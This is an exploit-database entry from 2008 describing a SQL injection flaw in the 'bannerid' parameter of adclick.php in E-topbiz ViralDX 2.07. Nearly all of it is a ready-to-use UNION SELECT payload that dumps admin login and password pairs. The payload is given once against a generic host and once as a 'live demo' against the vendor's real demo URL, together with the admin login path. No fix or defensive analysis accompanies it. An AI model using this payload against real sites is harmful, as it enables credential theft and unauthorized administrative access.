E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability

2008-06-24T00:00:00
ID 1337DAY-ID-3287
Type zdt
Reporter Hussin X
Modified 2008-06-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability
========================================================================



#########################################################
#
#   Viral DX 1  SQL Injection Vulnerability               
#                                               
#========================================================
#    HomE script : http://e-topbiz.com/
#     
#    Demo : http://e-topbiz.com/trafficdemos/viraldx1/  
#    
#
##########################################################

Exploit:   

http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws

(0x3a,login,pass)+from+pass--



L!VE DEMO:

http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-

1+union+select+concat_ws(0x3a,login,pass)+from+pass--


LoGiN :

/admin/login.php




#  0day.today [2018-01-06]  #